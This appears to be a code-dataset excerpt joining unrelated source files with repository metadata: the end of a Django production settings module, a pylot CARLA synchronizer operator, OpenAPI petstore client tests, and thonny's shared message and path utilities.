# https://github.com/jazzband/django-redis#memcached-exceptions-behavior
"IGNORE_EXCEPTIONS": True,
},
}
}
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure
SESSION_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure
CSRF_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds
# TODO: set this to 60 seconds first and then to 518400 once you prove the former works
SECURE_HSTS_SECONDS = 60
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True
)
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload
SECURE_HSTS_PRELOAD = env.bool("DJANGO_SECURE_HSTS_PRELOAD", default=True)
# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True
)
# STORAGES
# ------------------------------------------------------------------------------
# https://django-storages.readthedocs.io/en/latest/#installation
INSTALLED_APPS += ["storages"] # noqa F405
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = env("DJANGO_AWS_ACCESS_KEY_ID")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_SECRET_ACCESS_KEY = env("DJANGO_AWS_SECRET_ACCESS_KEY")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_STORAGE_BUCKET_NAME = env("DJANGO_AWS_STORAGE_BUCKET_NAME")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_QUERYSTRING_AUTH = False
# DO NOT change these unless you know what you're doing.
_AWS_EXPIRY = 60 * 60 * 24 * 7
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_OBJECT_PARAMETERS = {
"CacheControl": f"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate"
}
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_REGION_NAME = env("DJANGO_AWS_S3_REGION_NAME", default=None)
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#cloudfront
AWS_S3_CUSTOM_DOMAIN = env("DJANGO_AWS_S3_CUSTOM_DOMAIN", default=None)
aws_s3_domain = AWS_S3_CUSTOM_DOMAIN or f"{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com"
# STATIC
# ------------------------
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# MEDIA
# ------------------------------------------------------------------------------
DEFAULT_FILE_STORAGE = "django_skeleton_default.utils.storages.MediaRootS3Boto3Storage"
MEDIA_URL = f"https://{aws_s3_domain}/media/"
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = env(
"DJANGO_DEFAULT_FROM_EMAIL",
default="Django Skeleton Default <noreply@example.com>",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = env("DJANGO_SERVER_EMAIL", default=DEFAULT_FROM_EMAIL)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = env(
"DJANGO_EMAIL_SUBJECT_PREFIX",
default="[Django Skeleton Default]",
)
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL regex.
ADMIN_URL = env("DJANGO_ADMIN_URL")
# Anymail
# ------------------------------------------------------------------------------
# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail
INSTALLED_APPS += ["anymail"] # noqa F405
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference
# https://anymail.readthedocs.io/en/stable/esps/mailgun/
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
ANYMAIL = {
"MAILGUN_API_KEY": env("MAILGUN_API_KEY"),
"MAILGUN_SENDER_DOMAIN": env("MAILGUN_DOMAIN"),
"MAILGUN_API_URL": env("MAILGUN_API_URL", default="https://api.mailgun.net/v3"),
}
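# Hedged usage note (illustrative, not part of these settings): with the Mailgun
# backend configured above, ordinary django.core.mail calls are routed through
# Anymail, e.g. from a view or management command:
#   from django.core.mail import send_mail
#   send_mail("Subject", "Body", DEFAULT_FROM_EMAIL, ["user@example.com"])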
# django-compressor
# ------------------------------------------------------------------------------
# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_ENABLED
COMPRESS_ENABLED = env.bool("COMPRESS_ENABLED", default=True)
# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_URL
COMPRESS_URL = STATIC_URL # noqa F405
# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_OFFLINE
COMPRESS_OFFLINE = True # Offline compression is required when using Whitenoise
# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_FILTERS
COMPRESS_FILTERS = {
"css": [
"compressor.filters.css_default.CssAbsoluteFilter",
"compressor.filters.cssmin.rCSSMinFilter",
],
"js": ["compressor.filters.jsmin.JSMinFilter"],
}
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"root": {"level": "INFO", "handlers": ["console"]},
"loggers": {
"django.db.backends": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
# Errors logged by the SDK itself
"sentry_sdk": {"level": "ERROR", "handlers": ["console"], "propagate": False},
"django.security.DisallowedHost": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
},
}
# Sentry
# ------------------------------------------------------------------------------
SENTRY_DSN = env("SENTRY_DSN")
SENTRY_LOG_LEVEL = env.int("DJANGO_SENTRY_LOG_LEVEL", logging.INFO)
sentry_logging = LoggingIntegration(
level=SENTRY_LOG_LEVEL, # Capture info and above as breadcrumbs
event_level=logging.ERROR, # Send errors as events
)
integrations = [
sentry_logging,
DjangoIntegration(),
CeleryIntegration(),
RedisIntegration(),
]
sentry_sdk.init(
dsn=SENTRY_DSN,
integrations=integrations,
environment=env("SENTRY_ENVIRONMENT", default="production"),
traces_sample_rate=env.float("SENTRY_TRACES_SAMPLE_RATE", default=0.0),
)
# Your stuff...
# ------------------------------------------------------------------------------
| 42.209524
| 100
| 0.645645
|
6e80902352bfbda435e0751d46f7c89ef34f6fcd
| 3,215
|
py
|
Python
|
pylot/simulation/synchronizer_operator.py
|
seikurou/pylot
|
0e47c3dcaf6f0d4a3937b94846d2e55ef908dfa5
|
[
"Apache-2.0"
] | null | null | null |
pylot/simulation/synchronizer_operator.py
|
seikurou/pylot
|
0e47c3dcaf6f0d4a3937b94846d2e55ef908dfa5
|
[
"Apache-2.0"
] | null | null | null |
pylot/simulation/synchronizer_operator.py
|
seikurou/pylot
|
0e47c3dcaf6f0d4a3937b94846d2e55ef908dfa5
|
[
"Apache-2.0"
] | null | null | null |
import erdos
from erdos import ReadStream, Timestamp, WriteStream
from pylot.control.messages import ControlMessage
from pylot.simulation.utils import get_vehicle_handle, get_world, \
set_simulation_mode
class SynchronizerOperator(erdos.Operator):
"""Sends control messages when it receives a watermark on a stream.
The operator can be used to ensure that the simulator does not tick before the
slowest stream in a data-flow completes processing a timestamp.
Warning:
The operator should only be used with the CARLA auto pilot enabled.
Args:
wait_stream (:py:class:`erdos.ReadStream`): The stream on which to wait
for watermark messages.
control_stream (:py:class:`erdos.WriteStream`): Stream on which control
messages are published.
flags (absl.flags): Object to be used to access absl flags.
"""
def __init__(self, ground_vehicle_id_stream: ReadStream,
wait_stream: ReadStream, control_stream: WriteStream, flags):
erdos.add_watermark_callback([wait_stream], [control_stream],
self.on_watermark)
self._logger = erdos.utils.setup_logging(self.config.name,
self.config.log_file_name)
self._vehicle_id_stream = ground_vehicle_id_stream
self._vehicle = None
self._flags = flags
@staticmethod
def connect(ground_vehicle_id_stream: ReadStream, wait_stream: ReadStream):
control_stream = erdos.WriteStream()
return [control_stream]
def run(self):
# Read the vehicle ID from the vehicle ID stream.
vehicle_id_msg = self._vehicle_id_stream.read()
vehicle_id = vehicle_id_msg.data
# Connect to the world. We connect here instead of in the constructor
# to ensure we're connected to the latest world.
_, world = get_world(self._flags.carla_host, self._flags.carla_port,
self._flags.carla_timeout)
set_simulation_mode(world, self._flags)
self._vehicle = get_vehicle_handle(world, vehicle_id)
def on_watermark(self, timestamp: Timestamp, control_stream: WriteStream):
"""Invoked when the input stream has received a watermark.
The method sends a control message.
Args:
timestamp (:py:class:`erdos.timestamp.Timestamp`): The timestamp of
the watermark.
"""
self._logger.debug('@{}: received watermark'.format(timestamp))
# The control message is ignored by the bridge operator because
# data gathering is conducted using auto pilot.
# Send the control that the vehicle is currently applying.
vehicle_control = self._vehicle.get_control()
control_msg = ControlMessage(vehicle_control.steer,
vehicle_control.throttle,
vehicle_control.brake,
vehicle_control.hand_brake,
vehicle_control.reverse, timestamp)
control_stream.send(control_msg)
control_stream.send(erdos.WatermarkMessage(timestamp))
| 43.445946
| 79
| 0.65381
|
5e1dd8528c9c055522ecd220139310c1728e55c3
| 14,023
|
py
|
Python
|
samples/client/petstore/python-experimental/tests/test_pet_api.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 2
|
2019-12-08T12:00:11.000Z
|
2022-01-02T13:47:52.000Z
|
samples/client/petstore/python-experimental/tests/test_pet_api.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 8
|
2021-03-01T21:18:19.000Z
|
2022-02-27T07:56:15.000Z
|
samples/client/petstore/python-experimental/tests/test_pet_api.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 1
|
2019-11-26T06:36:44.000Z
|
2019-11-26T06:36:44.000Z
|
# coding: utf-8
# flake8: noqa
"""
Run the tests.
$ docker pull swaggerapi/petstore
$ docker run -d -e SWAGGER_HOST=http://petstore.swagger.io -e SWAGGER_BASE_PATH=/v2 -p 80:8080 swaggerapi/petstore
$ pip install nose (optional)
$ cd petstore_api-python
$ nosetests -v
"""
from collections import namedtuple
import json
import os
import unittest
import petstore_api
from petstore_api import Configuration
from petstore_api.rest import (
RESTClientObject,
RESTResponse
)
import six
from petstore_api.exceptions import (
ApiException,
ApiValueError,
ApiTypeError,
)
from .util import id_gen
import urllib3
if six.PY3:
from unittest.mock import patch
else:
from mock import patch
HOST = 'http://localhost/v2'
class TimeoutWithEqual(urllib3.Timeout):
def __init__(self, *arg, **kwargs):
super(TimeoutWithEqual, self).__init__(*arg, **kwargs)
def __eq__(self, other):
return self._read == other._read and self._connect == other._connect and self.total == other.total
class MockPoolManager(object):
def __init__(self, tc):
self._tc = tc
self._reqs = []
def expect_request(self, *args, **kwargs):
self._reqs.append((args, kwargs))
def request(self, *args, **kwargs):
self._tc.assertTrue(len(self._reqs) > 0)
r = self._reqs.pop(0)
self._tc.maxDiff = None
self._tc.assertEqual(r[0], args)
self._tc.assertEqual(r[1], kwargs)
return urllib3.HTTPResponse(status=200, body=b'test')
class PetApiTests(unittest.TestCase):
def setUp(self):
config = Configuration()
config.host = HOST
self.api_client = petstore_api.ApiClient(config)
self.pet_api = petstore_api.PetApi(self.api_client)
self.setUpModels()
self.setUpFiles()
def setUpModels(self):
self.category = petstore_api.Category()
self.category.id = id_gen()
self.category.name = "dog"
self.tag = petstore_api.Tag()
self.tag.id = id_gen()
self.tag.name = "python-pet-tag"
self.pet = petstore_api.Pet(name="hello kity", photo_urls=["http://foo.bar.com/1", "http://foo.bar.com/2"])
self.pet.id = id_gen()
self.pet.status = "sold"
self.pet.category = self.category
self.pet.tags = [self.tag]
def setUpFiles(self):
self.test_file_dir = os.path.join(os.path.dirname(__file__), "..", "testfiles")
self.test_file_dir = os.path.realpath(self.test_file_dir)
def test_preload_content_flag(self):
self.pet_api.add_pet(self.pet)
resp = self.pet_api.find_pets_by_status(status=[self.pet.status], _preload_content=False)
# return response should at least have read and close methods.
self.assertTrue(hasattr(resp, 'read'))
self.assertTrue(hasattr(resp, 'close'))
# Also we need to make sure we can release the connection to a pool (if exists) when we are done with it.
self.assertTrue(hasattr(resp, 'release_conn'))
# Right now, the client returns urllib3.HTTPResponse. If that changed in future, it is probably a breaking
# change, however supporting above methods should be enough for most usecases. Remove this test case if
# we followed the breaking change procedure for python client (e.g. increasing major version).
self.assertTrue(resp.__class__, 'urllib3.response.HTTPResponse')
resp.close()
resp.release_conn()
def test_timeout(self):
mock_pool = MockPoolManager(self)
self.api_client.rest_client.pool_manager = mock_pool
mock_pool.expect_request('POST', 'http://localhost/v2/pet',
body=json.dumps(self.api_client.sanitize_for_serialization(self.pet)),
headers={'Content-Type': 'application/json',
'Authorization': 'Bearer ',
'User-Agent': 'OpenAPI-Generator/1.0.0/python'},
preload_content=True, timeout=TimeoutWithEqual(total=5))
mock_pool.expect_request('POST', 'http://localhost/v2/pet',
body=json.dumps(self.api_client.sanitize_for_serialization(self.pet)),
headers={'Content-Type': 'application/json',
'Authorization': 'Bearer ',
'User-Agent': 'OpenAPI-Generator/1.0.0/python'},
preload_content=True, timeout=TimeoutWithEqual(connect=1, read=2))
self.pet_api.add_pet(self.pet, _request_timeout=5)
self.pet_api.add_pet(self.pet, _request_timeout=(1, 2))
def test_separate_default_client_instances(self):
pet_api = petstore_api.PetApi()
pet_api2 = petstore_api.PetApi()
self.assertNotEqual(pet_api.api_client, pet_api2.api_client)
pet_api.api_client.user_agent = 'api client 3'
pet_api2.api_client.user_agent = 'api client 4'
self.assertNotEqual(pet_api.api_client.user_agent, pet_api2.api_client.user_agent)
def test_separate_default_config_instances(self):
pet_api = petstore_api.PetApi()
pet_api2 = petstore_api.PetApi()
self.assertNotEqual(pet_api.api_client.configuration, pet_api2.api_client.configuration)
pet_api.api_client.configuration.host = 'somehost'
pet_api2.api_client.configuration.host = 'someotherhost'
self.assertNotEqual(pet_api.api_client.configuration.host, pet_api2.api_client.configuration.host)
def test_async_request(self):
thread = self.pet_api.add_pet(self.pet, async_req=True)
response = thread.get()
self.assertIsNone(response)
thread = self.pet_api.get_pet_by_id(self.pet.id, async_req=True)
result = thread.get()
self.assertIsInstance(result, petstore_api.Pet)
def test_async_with_result(self):
self.pet_api.add_pet(self.pet, async_req=False)
thread = self.pet_api.get_pet_by_id(self.pet.id, async_req=True)
thread2 = self.pet_api.get_pet_by_id(self.pet.id, async_req=True)
response = thread.get()
response2 = thread2.get()
self.assertEqual(response.id, self.pet.id)
self.assertIsNotNone(response2.id, self.pet.id)
def test_async_with_http_info(self):
self.pet_api.add_pet(self.pet)
thread = self.pet_api.get_pet_by_id(self.pet.id, async_req=True,
_return_http_data_only=False)
data, status, headers = thread.get()
self.assertIsInstance(data, petstore_api.Pet)
self.assertEqual(status, 200)
def test_async_exception(self):
self.pet_api.add_pet(self.pet)
thread = self.pet_api.get_pet_by_id(-9999999999999, async_req=True)
exception = None
try:
thread.get()
except ApiException as e:
exception = e
self.assertIsInstance(exception, ApiException)
self.assertEqual(exception.status, 404)
def test_add_pet_and_get_pet_by_id(self):
self.pet_api.add_pet(self.pet)
fetched = self.pet_api.get_pet_by_id(pet_id=self.pet.id)
self.assertIsNotNone(fetched)
self.assertEqual(self.pet.id, fetched.id)
self.assertIsNotNone(fetched.category)
self.assertEqual(self.pet.category.name, fetched.category.name)
def test_add_pet_and_get_pet_by_id_with_http_info(self):
self.pet_api.add_pet(self.pet)
fetched = self.pet_api.get_pet_by_id(
pet_id=self.pet.id,
_return_http_data_only=False
)
self.assertIsNotNone(fetched)
self.assertEqual(self.pet.id, fetched[0].id)
self.assertIsNotNone(fetched[0].category)
self.assertEqual(self.pet.category.name, fetched[0].category.name)
def test_update_pet(self):
self.pet.name = "hello kity with updated"
self.pet_api.update_pet(self.pet)
fetched = self.pet_api.get_pet_by_id(pet_id=self.pet.id)
self.assertIsNotNone(fetched)
self.assertEqual(self.pet.id, fetched.id)
self.assertEqual(self.pet.name, fetched.name)
self.assertIsNotNone(fetched.category)
self.assertEqual(fetched.category.name, self.pet.category.name)
def test_find_pets_by_status(self):
self.pet_api.add_pet(self.pet)
self.assertIn(
self.pet.id,
list(map(lambda x: getattr(x, 'id'), self.pet_api.find_pets_by_status(status=[self.pet.status])))
)
def test_find_pets_by_tags(self):
self.pet_api.add_pet(self.pet)
self.assertIn(
self.pet.id,
list(map(lambda x: getattr(x, 'id'), self.pet_api.find_pets_by_tags(tags=[self.tag.name])))
)
def test_update_pet_with_form(self):
self.pet_api.add_pet(self.pet)
name = "hello kity with form updated"
status = "pending"
self.pet_api.update_pet_with_form(pet_id=self.pet.id, name=name, status=status)
fetched = self.pet_api.get_pet_by_id(pet_id=self.pet.id)
self.assertEqual(self.pet.id, fetched.id)
self.assertEqual(name, fetched.name)
self.assertEqual(status, fetched.status)
def test_upload_file(self):
# upload file with form parameter
file_path1 = os.path.join(self.test_file_dir, "1px_pic1.png")
file_path2 = os.path.join(self.test_file_dir, "1px_pic2.png")
try:
file = open(file_path1, "rb")
additional_metadata = "special"
self.pet_api.upload_file(
pet_id=self.pet.id,
additional_metadata=additional_metadata,
file=file
)
except ApiException as e:
self.fail("upload_file() raised {0} unexpectedly".format(type(e)))
finally:
file.close()
# upload only one file
try:
file = open(file_path1, "rb")
self.pet_api.upload_file(pet_id=self.pet.id, file=file)
except ApiException as e:
self.fail("upload_file() raised {0} unexpectedly".format(type(e)))
finally:
file.close()
# upload multiple files
HTTPResponse = namedtuple(
'urllib3_response_HTTPResponse',
['status', 'reason', 'data', 'getheaders', 'getheader']
)
headers = {}
def get_headers():
return headers
def get_header(name, default=None):
return headers.get(name, default)
api_response = {
'code': 200,
'type': 'blah',
'message': 'file upload succeeded'
}
http_response = HTTPResponse(
status=200,
reason='OK',
data=json.dumps(api_response),
getheaders=get_headers,
getheader=get_header
)
mock_response = RESTResponse(http_response)
try:
file1 = open(file_path1, "rb")
file2 = open(file_path2, "rb")
with patch.object(RESTClientObject, 'request') as mock_method:
mock_method.return_value = mock_response
res = self.pet_api.upload_file(
pet_id=684696917, files=[file1, file2])
mock_method.assert_called_with(
'POST',
'http://localhost/v2/pet/684696917/uploadImage',
_preload_content=True,
_request_timeout=None,
body=None,
headers={
'Accept': 'application/json',
'Content-Type': 'multipart/form-data',
'User-Agent': 'OpenAPI-Generator/1.0.0/python',
'Authorization': 'Bearer '
},
post_params=[
('files', ('1px_pic1.png', b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x00\x00\x00\x00:~\x9bU\x00\x00\x00\nIDATx\x9cc\xfa\x0f\x00\x01\x05\x01\x02\xcf\xa0.\xcd\x00\x00\x00\x00IEND\xaeB`\x82', 'image/png')),
('files', ('1px_pic2.png', b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x00\x00\x00\x00:~\x9bU\x00\x00\x00\nIDATx\x9cc\xfa\x0f\x00\x01\x05\x01\x02\xcf\xa0.\xcd\x00\x00\x00\x00IEND\xaeB`\x82', 'image/png'))
],
query_params=[]
)
except ApiException as e:
self.fail("upload_file() raised {0} unexpectedly".format(type(e)))
finally:
file1.close()
file2.close()
# passing in an array of files to when file only allows one
# raises an exceptions
try:
file = open(file_path1, "rb")
with self.assertRaises(ApiTypeError) as exc:
self.pet_api.upload_file(pet_id=self.pet.id, file=[file])
finally:
file.close()
# passing in a single file when an array of file is required
# raises an exception
try:
file = open(file_path1, "rb")
with self.assertRaises(ApiTypeError) as exc:
self.pet_api.upload_file(pet_id=self.pet.id, files=file)
finally:
file.close()
# passing in a closed file raises an exception
with self.assertRaises(ApiValueError) as exc:
file = open(file_path1, "rb")
file.close()
self.pet_api.upload_file(pet_id=self.pet.id, file=file)
def test_delete_pet(self):
self.pet_api.add_pet(self.pet)
self.pet_api.delete_pet(pet_id=self.pet.id, api_key="special-key")
try:
self.pet_api.get_pet_by_id(pet_id=self.pet.id)
raise Exception("expected an error")
except ApiException as e:
self.assertEqual(404, e.status)
if __name__ == '__main__':
unittest.main()
| 37
| 259
| 0.616131
|
9628136159b638002b4272c62d6618369ccb909d
| 46
|
py
|
Python
|
scPrivacy_code/__init__.py
|
bm2-lab/scPrivacy
|
444c8f3a5e7b890c299cd823359e5414f73d6205
|
[
"MIT"
] | 1
|
2022-03-10T02:58:17.000Z
|
2022-03-10T02:58:17.000Z
|
scPrivacy_code/__init__.py
|
bm2-lab/scPrivacy
|
444c8f3a5e7b890c299cd823359e5414f73d6205
|
[
"MIT"
] | null | null | null |
scPrivacy_code/__init__.py
|
bm2-lab/scPrivacy
|
444c8f3a5e7b890c299cd823359e5414f73d6205
|
[
"MIT"
] | null | null | null |
from .scPrivacy import *
__version__ = '1.0'
| 11.5
| 24
| 0.695652
|
e7c228ae4f48a2e01a6b6423b12a9c999fa73423
| 15,044
|
py
|
Python
|
thonny/common.py
|
aroberge/thonny
|
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
|
[
"MIT"
] | null | null | null |
thonny/common.py
|
aroberge/thonny
|
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
|
[
"MIT"
] | null | null | null |
thonny/common.py
|
aroberge/thonny
|
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Classes used both by front-end and back-end
"""
import os.path
import platform
import site
import sys
import tokenize
from collections import namedtuple
from typing import List, Optional # @UnusedImport
import subprocess
import logging
MESSAGE_MARKER = "\x02"
ValueInfo = namedtuple("ValueInfo", ["id", "repr"])
FrameInfo = namedtuple(
"FrameInfo",
[
"id",
"filename",
"module_name",
"code_name",
"source",
"lineno",
"firstlineno",
"in_library",
"locals",
"globals",
"freevars",
"event",
"focus",
"node_tags",
"current_statement",
"current_root_expression",
"current_evaluations",
],
)
TextRange = namedtuple(
"TextRange", ["lineno", "col_offset", "end_lineno", "end_col_offset"]
)
class Record:
def __init__(self, **kw):
self.__dict__.update(kw)
def update(self, e, **kw):
self.__dict__.update(e, **kw)
def setdefault(self, **kw):
"updates those fields that are not yet present (similar to dict.setdefault)"
for key in kw:
if not hasattr(self, key):
setattr(self, key, kw[key])
def get(self, key, default=None):
return self.__dict__.get(key, default)
def __getitem__(self, key):
return self.__dict__[key]
def __delitem__(self, key):
self.__dict__.__delitem__(key)
def __setitem__(self, key, value):
self.__dict__[key] = value
def __contains__(self, key):
return key in self.__dict__
def __repr__(self):
keys = self.__dict__.keys()
items = ("{}={!r}".format(k, self.__dict__[k]) for k in keys)
return "{}({})".format(self.__class__.__name__, ", ".join(items))
def __str__(self):
keys = sorted(self.__dict__.keys())
items = ("{}={!r}".format(k, str(self.__dict__[k])) for k in keys)
return "{}({})".format(self.__class__.__name__, ", ".join(items))
def __eq__(self, other):
# pylint: disable=unidiomatic-typecheck
if type(self) != type(other):
return False
if len(self.__dict__) != len(other.__dict__):
return False
for key in self.__dict__:
if not hasattr(other, key):
return False
self_value = getattr(self, key)
other_value = getattr(other, key)
if type(self_value) != type(other_value) or self_value != other_value:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(repr(self))
def range_contains_smaller(one: TextRange, other: TextRange) -> bool:
this_start = (one.lineno, one.col_offset)
this_end = (one.end_lineno, one.end_col_offset)
other_start = (other.lineno, other.col_offset)
other_end = (other.end_lineno, other.end_col_offset)
return (
this_start < other_start
and this_end > other_end
or this_start == other_start
and this_end > other_end
or this_start < other_start
and this_end == other_end
)
def range_contains_smaller_or_equal(one: TextRange, other: TextRange) -> bool:
return range_contains_smaller(one, other) or one == other
class InputSubmission(Record):
"""For sending data to backend's stdin"""
def __init__(self, data: str, **kw) -> None:
super().__init__(**kw)
self.data = data
class CommandToBackend(Record):
"""Command meant for the back-end"""
def __init__(self, name: str, **kw) -> None:
super().__init__(**kw)
self.name = name
class ToplevelCommand(CommandToBackend):
def __init__(self, name: str, argv: List[str] = [], **kw) -> None:
super().__init__(name, **kw)
self.argv = argv
class DebuggerCommand(CommandToBackend):
pass
class InlineCommand(CommandToBackend):
"""
Can be used both during debugging and in waiting_toplevel_command state
(eg. for sending variable and heap info requests)
"""
pass
class MessageFromBackend(Record):
def __init__(self, **kw) -> None:
self.event_type = type(self).__name__ # allow event_type to be overridden by kw
super().__init__(**kw)
if not hasattr(self, "sequence"):
self.sequence = self.event_type
class ToplevelResponse(MessageFromBackend):
pass
class DebuggerResponse(MessageFromBackend):
pass
class BackendEvent(MessageFromBackend):
def __init__(self, event_type: str, **kw) -> None:
super().__init__(**kw)
self.event_type = event_type
class InlineResponse(MessageFromBackend):
def __init__(self, command_name: str, **kw) -> None:
super().__init__(**kw)
self.command_name = command_name
self.event_type = self.command_name + "_response"
def serialize_message(msg: Record) -> str:
# I want to transfer only ASCII chars because encodings are not reliable
# (eg. can't find a way to specify PYTHONIOENCODING for cx_freeze'd program)
return MESSAGE_MARKER + repr(msg).encode("UTF-7").decode("ASCII")
def parse_message(msg_string: str) -> Record:
# DataFrames may have nan
# pylint: disable=unused-variable
nan = float("nan") # @UnusedVariable
assert msg_string[0] == MESSAGE_MARKER
return eval(msg_string[1:].encode("ASCII").decode("UTF-7"))
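# Hedged illustration (not part of thonny): serialize_message/parse_message
# round-trip a Record subclass through the ASCII-only wire format used above.
def _example_message_round_trip():
    msg = ToplevelCommand("execute_source", argv=["main.py"])
    wire = serialize_message(msg)
    assert parse_message(wire) == msg
    return wire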
def normpath_with_actual_case(name: str) -> str:
"""In Windows return the path with the case it is stored in the filesystem"""
assert os.path.isabs(name) or os.path.ismount(name), "Not abs nor mount: " + name
assert os.path.exists(name)
if os.name == "nt":
name = os.path.realpath(name)
from ctypes import create_unicode_buffer, windll
buf = create_unicode_buffer(512)
windll.kernel32.GetShortPathNameW(name, buf, 512) # @UndefinedVariable
windll.kernel32.GetLongPathNameW(buf.value, buf, 512) # @UndefinedVariable
if len(buf.value):
result = buf.value
else:
result = name
assert isinstance(result, str)
if result[1] == ":":
# ensure drive letter is capital
return result[0].upper() + result[1:]
else:
return result
else:
return os.path.normpath(name)
def is_same_path(name1: str, name2: str) -> bool:
return os.path.normpath(os.path.normcase(name1)) == os.path.normpath(
os.path.normcase(name2)
)
def path_startswith(child_name: str, dir_name: str) -> bool:
normchild = os.path.normpath(os.path.normcase(child_name))
normdir = os.path.normpath(os.path.normcase(dir_name))
return normdir == normchild or normchild.startswith(
normdir.rstrip(os.path.sep) + os.path.sep
)
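# Editor's hedged examples for the two path helpers above (the Windows-style paths
# are illustrative only):
#
#     is_same_path(r"C:\Temp\x.py", "c:/temp/X.PY")        # True on Windows
#     path_startswith(r"C:\proj\src\a.py", r"C:\proj")     # True
#     path_startswith(r"C:\project", r"C:\proj")           # False, not a child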
def read_source(filename):
with tokenize.open(filename) as fp:
return fp.read()
def get_exe_dirs():
result = []
if site.ENABLE_USER_SITE:
if platform.system() == "Windows":
if site.getusersitepackages():
result.append(
site.getusersitepackages().replace("site-packages", "Scripts")
)
else:
if site.getuserbase():
result.append(site.getuserbase() + "/bin")
main_scripts = os.path.join(sys.prefix, "Scripts")
if os.path.isdir(main_scripts) and main_scripts not in result:
result.append(main_scripts)
if os.path.dirname(sys.executable) not in result:
result.append(os.path.dirname(sys.executable))
return result
def get_site_dir(symbolic_name, executable=None):
if not executable or executable == sys.executable:
result = getattr(site, symbolic_name, "")
else:
result = (
subprocess.check_output(
[
executable,
"-m",
"site",
"--" + symbolic_name.lower().replace("_", "-"),
],
universal_newlines=True,
)
.strip()
)
return result if result else None
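# Editor's hedged example: symbolic_name mirrors the attribute names of the stdlib
# `site` module, so typical calls look like:
#
#     get_site_dir("USER_SITE")                        # current interpreter
#     get_site_dir("USER_BASE", "/usr/bin/python3")    # runs `python3 -m site --user-base`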
def get_base_executable():
if sys.exec_prefix == sys.base_exec_prefix:
return sys.executable
if platform.system() == "Windows":
result = sys.base_exec_prefix + "\\" + os.path.basename(sys.executable)
result = normpath_with_actual_case(result)
else:
result = sys.executable.replace(sys.exec_prefix, sys.base_exec_prefix)
if not os.path.isfile(result):
raise RuntimeError("Can't locate base executable")
return result
def get_augmented_system_path(extra_dirs):
path_items = os.environ.get("PATH", "").split(os.pathsep)
for d in reversed(extra_dirs):
if d not in path_items:
path_items.insert(0, d)
return os.pathsep.join(path_items)
def update_system_path(env, value):
# in Windows, env keys are not case sensitive
# this is important if env is a dict (not os.environ)
if platform.system() == "Windows":
found = False
for key in env:
if key.upper() == "PATH":
found = True
env[key] = value
if not found:
env["PATH"] = value
else:
env["PATH"] = value
